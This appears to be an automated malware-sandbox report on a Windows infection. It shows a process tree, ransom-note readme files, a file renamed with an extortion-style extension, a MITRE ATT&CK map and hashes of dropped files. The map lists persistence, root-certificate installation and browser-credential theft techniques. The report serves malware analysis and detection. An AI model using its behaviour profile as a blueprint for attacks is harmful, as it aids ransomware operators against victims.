C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=5436,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6232 --brver=24.10.2.705 /prefetch:82⤵PID:13060
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=5140,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6248 --brver=24.10.2.705 /prefetch:82⤵PID:11156
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --user-id --brand-id=yandex --partner-id=pseudoportal-ru --process-name="Data Decoder Service" --field-trial-handle=6224,i,1427701107212254732,6286595053527967399,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6368 --brver=24.10.2.705 /prefetch:82⤵PID:11892
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\x8vdd02w-readme.txt1⤵PID:12100
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\0afdme8-readme.txt1⤵PID:13272
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
1Indicator Removal
4File Deletion
4Modify Registry
3Subvert Trust Controls
2Install Root Certificate
1SIP and Trust Provider Hijacking
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Discovery
Network Service Discovery
2Peripheral Device Discovery
2Query Registry
8Remote System Discovery
1System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1System Time Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129B
MD5a526b9e7c716b3489d8cc062fbce4005
SHA12df502a944ff721241be20a9e449d2acd07e0312
SHA256e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88
-
Filesize
464KB
MD5aa7c6f1e97f65fc60f7710b479421556
SHA160c05eaef33a58f29b77b49823b67d930601995f
SHA256c08ceba77fd49247a5ddef08f4d5d1ac7c11989b8220bc843578b0cdba934f48
SHA512ea824ef295718ef179ba1cc8c0f533e9e69ae3dbeac2d2f5723f4a38d2783064bae45fd60c16c250e2bcd8f86170d24d69efd9e4d76980dd1c5db3b13d9f3441
-
Filesize
2.4MB
MD5fc97164a5dddd55d2d1ac6cc6156771d
SHA1cf7953ef61fd18941d2f9c1599ad01d5d57dd987
SHA256778a127b88bb644a7c66d08932a446b85409fe7049bbae0dc15b9d364f2870f4
SHA512d7ca2fc40a6dde28a567f86b5beb87c867f01e6832d7a49eafa9b3987b7e9ee992f6d5104181f19888f6e0af45a7e90b17ebeae489e3956fd537ce1ba02bc79c
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R32.dll.id-DD34E558.[[email protected]].bot
Filesize2.7MB
MD524e80928b2ba0b8a55728173ef16080a
SHA1820f2fd8fd4421f8644a9ab1c82a2fae26971eef
SHA2566722d5daaeb83f18dd31e1e748cd0efc8c9f3898c9a4e85f767aa5669a89d05d
SHA512f375b9a8cd8932452682722c37cbbfcc3a4fb82e5fecd8e5b39f3a64865fc44e4bd5ba0cfc2da444814b1121319931ed1f5b3a5438d1cb36d846b39f15035691
-
Filesize
1KB
MD5b2ffd766269acf502d308a2524dc56f5
SHA14045a800108ee55d17492844e2ec052a10691061
SHA2569265ce032377a3cedb585d10c62494f6e325734033588ec73f314aab3379605d
SHA51219e37a753b3e60c13950ade797baeb1f2c9027fc0914bf851fa8a8a912e07c72132a4e7f07a4d0d2abbb7ee2735a9ee62335cafa5a368677f43081c6eab9857a
-
Filesize
3KB
MD585edfe9ccaa024b112c1221ab5c9e4aa
SHA1d792af8c7e7af10338fdfe326458f42f85046ced
SHA2563bc3d3514e503937ea749ef6987288eae3314517947fc32d8734ff3fd2df7a89
SHA512f4445f14d1149d49eeedbf4ce5241f2d2d39b15491a74163466d1e99fffbe34432f57ff6a0fc03297c76acaed78877ca191888bac81d0acf6843474cd78613c8
-
Filesize
4KB
MD57f4923eefdc34f8583aeca9279b25ea3
SHA10b54c878ea942439597755d3d60fed3d21430760
SHA2560637018d402dc5392bbb9e35e0787ef6b0ca90a073f1c1d285f2ce531bb515c3
SHA512cd31cd5c011eaf5a55947fbfef5bcba54fefb6d59dcf7cb3de6f0adf420fc6744739eb68afa3c3bcdaf40bce9786d625a1b3b2201c1af213346e6f5b36681403
-
Filesize
6KB
MD5683e0efd0671fe9435c30bde34904606
SHA1a55067bfb9b379b1b2f830ecc526513ad1a54836
SHA256064a93a1cd3ddc8cf4f66a67d7ac94352f31961260cb66da355d0d930efa8fef
SHA51260fd12208e8109c91aa054a688c0817d55cb152f6c8399cdfa5e5a0443d26d500a72acbf59fbb5ead742266fe19693a0a765912e7d1fde74d01fa26c0f6d7da3
-
Filesize
7KB
MD534b4ddce928a5c5bcb2f5abdd80d7fb2
SHA1adbf391f054e6956e731015eed5192fb174889d6
SHA2565fc7abbcccde42d61eef3638233aa97a34369d533eb23f2f79176241eb0c0d9f
SHA512813a2aefbe2654fa63e881f1f457d7da50bdb00e47c1a309fc5207b379bb1a8d3d41e32ab888b099e2c86e678c50f169157620adf7409d6cbd2c50df86ad8465
-
Filesize
6KB
MD5bd2c31aa40079a0151c1acdcde0cad37
SHA17b96332a233df7e98705925d00f85fc8e81f3a99
SHA256e2ad9285a19ba3f6bcb201728cf7e6aaf5f463cbf3ee01c0adca07474a192e76
SHA512c23c9f6356b24386bf6aa938dddfedb8cebc5c9835499d38281af9116b076bb4085fae19b8ab4a7790ede44e840f8ba1f1cbc21ad08494a2e05bf75cade5f48d
-
Filesize
6KB
MD5a5a4b3428653262ef3246e0b5b948ba1
SHA1c2c7a8f2ac392fc375af23f99f8d14064a8ac96d
SHA2566c55857da69eb48b210e0c79bf731fa4d6f34089e6edc927285a97d8d3896772
SHA5123b436389bd74438a6b3422045d2c0e8ff8700eebe62239515a7deba942b7189919a72aed1bd78f7decd6028ed766b7b9069c762d7ac8345fb2f7001c0e176895
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
5KB
MD5a6f6261de61d910e0b828040414cee02
SHA1d9df5043d0405b3f5ddaacb74db36623dd3969dc
SHA2566bb91f1d74389b18bce6e71772e4c5573648c1a4823338193f700afdf8216be5
SHA51220cb7b646c160c942e379c6e7a1a8981a09f520361c0205052c1d66e2fdb76333ffaaf0ca1dfc779754f0e844b9946900fbd5690d01869e1607abc1fda6dffab
-
Filesize
10.1MB
MD5e6d10b61b551b826819f52ac1dd1ea14
SHA1be2cdcba51f080764858ca7d8567710f2a692473
SHA25650d208224541ab66617323d8d791c06970a828eeb15b214965a5d88f6a093d41
SHA5120d5d98424bab24ccced9b73d5ed58851d320e0540963a3ccc14da6d6231b2413136fa11458dc2155bb5844af9e28f3a053f8b7f709a806a4070c5ff737fb0ac8
-
Filesize
116B
MD50f9215ed5d1642015eee94bf8f8dc7a4
SHA1d74b19194375014d11e577bd200a2503f2bcfa55
SHA256d453a7de9e736b4b2547582ca6440f5b931bdc88e0fa2b63aae71faf93908608
SHA51278448910b2b76baf6e32df1fdeda67219b93105b6ff69965b734b417cd6832a505018e39e74e2c48825e040bcef5719636e46381b3d7413e8929b7277034d2a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
148B
MD5c672c5ffd1a94b729484cc279d2a8a93
SHA13e3ce8ad41d3ffe36d461a21ded8fead5d11e88b
SHA256087e2c68049f6d81393d62c9fbca232111ec9e0411f5cc9ab1e718475581eaea
SHA512969821c1ea8ae7b400e0e603326a3eb76ad22c21572a12b34e50f97f174f53456e937872c1a5980f7401d702c56c00ec0c5fa4d9cdc38b7d2c6200037f12aae3
-
Filesize
7KB
MD5e8d73b63fa867a3835973c30fa31daa6
SHA1f25bdf2ded7a561d2917e021ef93c0212201fde4
SHA2565c9e47f0ffaaf8dfeb5079ebde6909388ed35fb60103a6d12d85a292a80e0239
SHA51222665cb113c75972d7c03e3015d829d7a21c45bc6b4a529b25dba8474116add548d05ef7242cb8543e4af4e0e672b6c908164d98a99c93574cf038154eeded09
-
Filesize
189KB
MD5b18d1001e98ec00bfb8c802ce0fefe2a
SHA1a8fed86e4df6d790486a0db05d6b4e133d04ef8c
SHA256d6e1c2dcbb7d16bdd7e5082283603608159cf56800409e593d297ab47240dfe1
SHA512d07955cf8f84c3330d7990f7f553b0ac120a9bbbe02a918f5777a8667afe3f579aa10c743ec7d66d4b82e4f73df77abfd9305219e07d4ec9d432ff68519e61ca
-
Filesize
24KB
MD5640bff73a5f8e37b202d911e4749b2e9
SHA19588dd7561ab7de3bca392b084bec91f3521c879
SHA256c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502
SHA51239c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a
-
Filesize
16KB
MD5c8ffec7d9f2410dcbe25fe6744c06aad
SHA11d868cd6f06b4946d3f14b043733624ff413486f
SHA25650138c04dc8b09908d68abc43e6eb3ab81e25cbf4693d893189e51848424449f
SHA5124944c84894a26fee2dd926bf33fdf4523462a32c430cf1f76a0ce2567a47f985c79a2b97ceed92a04edab7b5678bfc50b4af89e0f2dded3b53b269f89e6b734b
-
Filesize
11KB
MD5da979fedc022c3d99289f2802ef9fe3b
SHA12080ceb9ae2c06ab32332b3e236b0a01616e4bba
SHA256d6d8f216f081f6c34ec3904ef635d1ed5ca9f5e3ec2e786295d84bc6997ddcaa
SHA512bd586d8a3b07052e84a4d8201945cf5906ee948a34806713543acd02191b559eb5c7910d0aff3ceab5d3b61bdf8741c749aea49743025dbaed5f4c0849c80be6
-
Filesize
510B
MD527bdb0864e3f7a9f6c61810adeaa9f53
SHA13c911d197a054a51a1ad444e3bcc4b634063597a
SHA2565981cca348493c670d47550ec9b201662046f5bb7c298af860c28814ff2f112f
SHA5120a4d78904c5efc0a2529b8d6f3e8e7001dd59807de8e9bd195e2f8a561b2e15de827dd65a74f7010f534f24df5fa2adb3e56074848878119955890feacde24ea
-
Filesize
203KB
MD5b9314504e592d42cb36534415a62b3af
SHA1059d2776f68bcc4d074619a3614a163d37df8b62
SHA256c60c3a7d20b575fdeeb723e12a11c2602e73329dc413fc6d88f72e6f87e38b49
SHA512e50adb690e2f6767001031e83f40cc067c9351d466051e45a40a9e7ff49049e35609f1e70dd7bb4a4721a112479f79090decca6896deac2680e7d107e3355dae
-
Filesize
8.7MB
MD56e358158ab5be3e47deff097020a2a42
SHA132cf029a0e15ddb01b0513fda4158addecadf9c9
SHA2568b979e74878e9f8c8b4cbb6bdbd0faf8321718a2ed32040daf28ac2bed365f7a
SHA512bc5abed9bf03274d9dad6c242cc9870bb5fdccc61f205ba18ee2d5c82f36c1ce7632aa2a94723bc65fc057ff383fcf01312f3d50bf7198c622b5e4aba9f7eebe
-
Filesize
2KB
MD57a19a6ae004de5e51a000037c58aa1f0
SHA17ddf8f4d94c36e923716b1ad6bff5d287c6121f7
SHA256406c3112ee193236ba428518fc7998b2d4a3ec31580c9336431d4b63fb746d81
SHA512cf11b53b2e2ea1942dc6fa11400a9323972d5e52befc4682a46fe28f3d7bd49e400baf99f98f8a2af427cedce9941d6401e553cbb8120f724faac8a77c3dcc95
-
Filesize
603KB
MD5a441a9ee7e6c3f26f3dbaa2f1f10bab0
SHA1c90eebe1b8fc726ecab5e16eeecb26eb1f7d0fab
SHA2566f76f97f0d95043db6b61b20befb1e65a1b1e01670db41e2cca1d6eafd9dd8a6
SHA5129f86f8d9697041a69ca916ade30688be3462e04247d5fb50f9a0131a5be70dbbfc73d19f526354df9f910b893869d0f417f057baaa08e7e91fba57b240c95426
-
Filesize
515B
MD51e63f6624a6ff3c308ea92c75b17d3a3
SHA123567ecb9581c048853a904f58a982dd3c9e9b10
SHA25697ac1a85f499b359be29deca4328bfcda295b53bd3f915b6d567b7d75158bd9f
SHA5121ea1a01eb8e7975125b0296ad34eab4ccef562da49533bd496fd3a09a2d482689a8639f69960336e3e4608b680c4d03ab2b468047f38083c50867a0442fdcbda
-
Filesize
8KB
MD542a97368c30c3f21a3904a70b5ace40e
SHA1387abb2af67672b93ff9a5725a091e0856036c8a
SHA2568fbb24d7ef68e7ac56afe35feb24e37614f10d343a3a1b906e14d3e89c3e2e57
SHA512ff56ae8b1a7f137d183fdf5ac4c03836b5ada7cf91dc59ababaef211d02c4a390b39a216e8571187cb713331771e5f3ccaaf8f06436bef461a7e89467f73d8d5
-
Filesize
341B
MD5977bc7b2384ef1b3e78df8fbc3eeb16b
SHA17ee6110ca253005d738929b7ba0cc54ed2ed0a2e
SHA25682e288090168abe15419015317fd38f56c1136e7481f66656d84e0a2d861d4d6
SHA5124d154832ef3ac05abb1499a5bc8235d72f64cdaa3e6870206a6363c1d85d821604ae8a96850c2c8bd540d479b8dd5f3ce032472ed96bbf7eddb168ea3d2d1cf6
-
Filesize
3.8MB
MD572bc2a73b7ab14ffec64ad8fea21de44
SHA1dab9ce89b997b88956485b6659608405f1f96271
SHA256112f12480a3c98b47f5cb30bc547c2574c5c33d1f6412252c0d0f02b584812e8
SHA51246ed47de438821818bc41068d48efa9afb0ad99f4d74d32fe7ea3c269dd92d66db7b1710625592e119f3fbc7189f77e09f9ada6cbc9ae34ee6468c2bf1256329
-
Filesize
1KB
MD574e81bd42fbbd80f060b3b36cb76516f
SHA1a707d8d77a191dbb99eaa2edf455cb4ecf95a3ac
SHA256a196c8f69e47b24092b000fc49e82e38e8405f042b6018cae14153389ef899eb
SHA512144e0ec824110a6e0e9ba7090341d7bc4716a1d2bc3b29b0dfb7c675a4d0d5b16a9237c6a0bd3b81f80b69d06d57c8fbb978fc122b099f611b2ba11280bf9249
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\Extensions\ghjgbemlcjioaaejhnnmgfpiplgalgcl.json
Filesize119B
MD52ec6275318f8bfcab1e2e36a03fd9ffa
SHA1063008acf0df2415f5bd28392d05b265427aac5c
SHA25620832de8163d5af0a0c8bda863bcd6083df4f92175d856ce527de1dae1f7c433
SHA5125eee4555be05d07bce49c9d89a1a64bb526b83e3ca6f06e2f9ef2094ad04c892110d43c25183da336989a00d05dad6ff5898ff59e2f0a69dcaaf0aa28f89a508
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\about_logo_en.png
Filesize1KB
MD51376f5abbe56c563deead63daf51e4e9
SHA10c838e0bd129d83e56e072243c796470a6a1088d
SHA256c56ae312020aef1916a8a01d5a1fc67ed3b41e5da539c0f26632c904a5e49c62
SHA512a0bab3bae1307ea8c7ccbd558b86c9f40e748cdd6fd8067bb33eeef863191534af367a0058111553a2c3a24e666a99009176a8636c0a5db3bf1aa6226130498f
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\about_logo_en_2x.png
Filesize3KB
MD5900fdf32c590f77d11ad28bf322e3e60
SHA1310932b2b11f94e0249772d14d74871a1924b19f
SHA256fe20d86fd62a4d1ab51531b78231749bd5990c9221eab1e7958be6d6aef292d9
SHA51264ebc4c6a52440b4f9f05de8ffb343c2024c4690fe5c9f336e78cd1dd01ae8225e8bc446f386feb442e76136b20d6b04ee293467b21f5b294ce25e500922f453
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\about_logo_ru.png
Filesize1KB
MD5ff321ebfe13e569bc61aee173257b3d7
SHA193c5951e26d4c0060f618cf57f19d6af67901151
SHA2561039ea2d254d536410588d30f302e6ab727d633cf08cb409caa5d22718af5e64
SHA512e98fbfb4ed40c5ac804b9f4d9f0c163508c319ec91f5d1e9deb6a5d3eada9338980f1b5fe11c49e6e88935ecd50119d321ce55ca5bdd0723a6e8c414e1e68e16
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\about_logo_ru_2x.png
Filesize3KB
MD5a6911c85bb22e4e33a66532b0ed1a26c
SHA1cbd2b98c55315ac6e44fb0352580174ed418db0a
SHA2565bb0977553ded973c818d43a178e5d9874b24539dacbd7904cd1871e0ba82b23
SHA512279fb0c1f2871ce41b250e9a4662046bc13c6678a79866eaf317cc93c997a683114122092214ce24f8e7f8a40520fe4ca03f54930148f4f794df0df3ecf74e9d
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\configs\all_zip
Filesize657KB
MD52c08a29b24104d4ae2976257924aa458
SHA1b318b5591c3c9e114991ff4a138a352fb06c8b54
SHA256b56d63a9d59d31d045d8b8bd9368a86080e0d2c0ef1dd92b6318682dc3766a85
SHA51211f71cadb24234f5e280c4c7d4a7bd53f655c4c7aa8c10118dbc665b8a34e2ec6530f22a86d976c7232f27e16976b53b06224e6b307a95b5b7ceaa0acc8e21c7
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\easylist\easylist.txt
Filesize620KB
MD58e4bcad511334a0d363fc9f0ece75993
SHA162d4b56e340464e1dc4344ae6cb596d258b8b5de
SHA2562f317fee439877eaadb1264bd3d1e153c963ef98596a4ccf227592aea12ae76f
SHA51265077bd249c51be198234ff927040ef849cd79adcd611ed2afae511bc2a257a21f13171bf01cb06fce788c1cff88c8ad39cf768c5900d77cd15453a35e7f0721
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\easylist\manifest.json
Filesize68B
MD515bcd6d3b8895b8e1934ef224c947df8
SHA1e4a7499779a256475d8748f6a00fb4580ac5d80d
SHA25677334f6256abddcc254f31854d1b00aa6743e20aadbb9e69187144847099a66b
SHA512c2d3778a99af8d8598e653593d5e2d1d0b3b2ace11addd2d3eeb2bf3b57d51bf938ddaf2d2743322e0ce02e291b81f61c319daf34c1cd604ffce1f6407a30b34
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\extension\elokbjeafkcggjfjkakpchmcmhkhaofn\brand_settings.json
Filesize379B
MD5f70c4b106fa9bb31bc107314c40c8507
SHA12a39695d79294ce96ec33b36c03e843878397814
SHA2564940847c9b4787e466266f1bb921097abb4269d6d10c0d2f7327fde9f1b032b7
SHA512494dce5543e6dacc77d546015f4ea75fd2588625e13450dba7ba0bd4c2f548b28c746a0d42c7f9b20d37f92af6710927d4bccb2fee4faa17d3ec2c07ff547e70
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\extension\fcgfaidpicddcilhjhafmmcgfodijhjd\brand_settings.json
Filesize316B
MD5a3779768809574f70dc2cba07517da14
SHA1ffd2343ed344718fa397bac5065f6133008159b8
SHA256de0fbb08708d4be7b9af181ec26f45fccd424e437bc0cfb5cf38f2604f01f7b2
SHA51262570be7ea7adee14b765d2af46fcd4dc8eec9d6274d9e00c5f361ff9b0cdb150305edad65a52b557c17dd9682e371004a471fa8958b0bd9cfbe42bb04ca5240
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\extension\gopnelejddjjkamjfblkcijjikkinnec\brand_settings.json
Filesize246B
MD530fdb583023f550b0f42fd4e547fea07
SHA1fcd6a87cfb7f719a401398a975957039e3fbb877
SHA256114fd03aa5ef1320f6cc586e920031cf5595a0d055218ce30571ff33417806d3
SHA512bae328e1be15c368f75396d031364bef170cfcf95dbdf4d78be98cff2b37a174d3f7ebb85b6e9eb915bb6269898cbcecd8a8415dc005c4444175fe0447126395
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\import-bg.png
Filesize9KB
MD585756c1b6811c5c527b16c9868d3b777
SHA1b473844783d4b5a694b71f44ffb6f66a43f49a45
SHA2567573af31ed2bfcfff97ed2132237db65f05aff36637cd4bdeccdf8ca02cd9038
SHA5121709222e696c392ca7bcd360f9a2b301896898eb83ddfb6a9db0d0c226a03f50671633b8bed4d060d8f70df7282ffc2cd7ab1d1449acf2e07a7b6c251aa3a19e
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\morphology\dictionary-ru-RU.mrf
Filesize1.1MB
MD50be7417225caaa3c7c3fe03c6e9c2447
SHA1ff3a8156e955c96cce6f87c89a282034787ef812
SHA2561585b1599418d790da830ef11e8eeceee0cbb038876fe3959cc41858bd501dbc
SHA512dfc0de77b717029a8c365146522580ab9d94e4b2327cef24db8f6535479790505c337852d0e924fbfa26e756b3aec911f27f5f17eba824496365c9a526464072
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\morphology\dictionary-ru-RU.mrf.sig
Filesize256B
MD5d704b5744ddc826c0429dc7f39bc6208
SHA192a7ace56fb726bf7ea06232debe10e0f022bd57
SHA256151739137bbbdf5f9608a82ec648bdf5d7454a81b86631b53dfc5ad602b207d6
SHA5121c01217e3480872a6d0f595ceb1b2242ffe3e1ff8b3fdd76eea13a7541606b94d3ccd69492a88220e0e40c17da5d785e4dba1d7501e6be749b9c46f72572ef6f
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\morphology\stop-words-ru-RU.list
Filesize52B
MD524281b7d32717473e29ffab5d5f25247
SHA1aa1ae9c235504706891fd34bd172763d4ab122f6
SHA256cbeec72666668a12ab6579ae0f45ccbdbe3d29ee9a862916f8c9793e2cf55552
SHA5122f81c87358795640c5724cfabcabe3a4c19e5188cedeab1bd993c8ccfc91c9c63a63e77ac51b257496016027d8bccb779bd766174fa7ea2d744bd2e2c109cb8b
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\safebrowsing\download.png
Filesize437B
MD5528381b1f5230703b612b68402c1b587
SHA1c29228966880e1a06df466d437ec90d1cac5bf2e
SHA2563129d9eaba1c5f31302c2563ebfa85747eda7a6d3f95602de6b01b34e4369f04
SHA5129eb45b0d4e3480a2d51a27ac5a6f20b9ef4e12bf8ac608043a5f01a372db5ea41a628458f7a0b02aaba94cd6bb8355a583d17666f87c3f29e82a0b899e9700bd
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\sxs.ico
Filesize43KB
MD5592b848cb2b777f2acd889d5e1aae9a1
SHA12753e9021579d24b4228f0697ae4cc326aeb1812
SHA256ad566a3e6f8524c705844e95a402cdeb4d6eed36c241c183147409a44e97ebcd
SHA512c9552f4db4b6c02707d72b6f67c2a11f1cf110b2c4ac5a1b7ac78291a14bf6eb35a9b4a05bc51ac80135504cd9dcad2d7a883249ee2e20a256cb9e9ceeb0032f
-
Filesize
617KB
MD558697e15ca12a7906e62fc750e4d6484
SHA1c5213072c79a2d3ffe5e24793c725268232f83ab
SHA2561313aa26cc9f7bd0f2759cfaff9052159975551618cba0a90f29f15c5387cad4
SHA512196b20d37509ea535889ec13c486f7ee131d6559fb91b95de7fdd739d380c130298d059148c49bf5808d8528d56234c589c9d420d63264f487f283f67a70c9a6
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\wallpapers\1-1x.png
Filesize18KB
MD580121a47bf1bb2f76c9011e28c4f8952
SHA1a5a814bafe586bc32b7d5d4634cd2e581351f15c
SHA256a62f9fdf3de1172988e01a989bf7a2344550f2f05a3ac0e6dc0ccd39ed1a697e
SHA512a04df34e61fd30764cf344b339ba2636b9280a358863f298690f6a8533c5e5dfa9773a14f8d16a5bb709ea17cf75e1da6302335aa9120009892e529bfad30df9
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\wallpapers\abstract\light.jpg
Filesize536KB
MD53bf3da7f6d26223edf5567ee9343cd57
SHA150b8deaf89c88e23ef59edbb972c233df53498a2
SHA2562e6f376222299f8142ff330e457867bad3300b21d96daec53579bf011629b896
SHA512fef8e951c6cf5cec82dbeafd306de3ad46fd0d90e3f41dcea2a6046c95ab1ae39bf8a6e4a696580246c11330d712d4e6e8757ba24bbf180eec1e98a4aec1583b
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\wallpapers\abstract\light_preview.jpg
Filesize5KB
MD59f6a43a5a7a5c4c7c7f9768249cbcb63
SHA136043c3244d9f76f27d2ff2d4c91c20b35e4452a
SHA256add61971c87104187ae89e50cec62a196d6f8908315e85e76e16983539fba04b
SHA51256d7bd72c8a380099309c36912513bcafbe1970830b000a1b89256aae20137c88e1e281f2455bb381ab120d682d6853d1ef05d8c57dd68a81a24b7a2a8d61387
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\wallpapers\custogray\custogray_full.png
Filesize313B
MD555841c472563c3030e78fcf241df7138
SHA169f9a73b0a6aaafa41cecff40b775a50e36adc90
SHA256a7cd964345c3d15840b88fd9bc88f0d0c34a18edbf1ce39359af4582d1d7da45
SHA512f7433d17937342d9d44aa86bcc30db9ae90450b84aa745d2c7390ff430449e195b693a8ae6df35d05fee2d97149a58a7d881737d57902d9885c6c55393d25d6f
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\wallpapers\custogray\preview.png
Filesize136B
MD50474a1a6ea2aac549523f5b309f62bff
SHA1cc4acf26a804706abe5500dc8565d8dfda237c91
SHA25655a236ad63d00d665b86ff7f91f2076226d5ed62b9d9e8f835f7cb998556545f
SHA512d8e3de4fea62b29fd719376d33a65367a3a2a2a22ed175cc1eeff3e38dfbaac448c97a6fbea55bc6159351d11a6aad97e09cb12548cf297e01bd23bf6074de08
-
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.10.2.705\resources\wallpapers\custogray\wallpaper.json
Filesize233B
MD5662f166f95f39486f7400fdc16625caa
SHA16b6081a0d3aa322163034c1d99f1db0566bfc838
SHA2564cd690fb8ed5cd733a9c84d80d20d173496617e8dde6fca19e8a430517349ed5
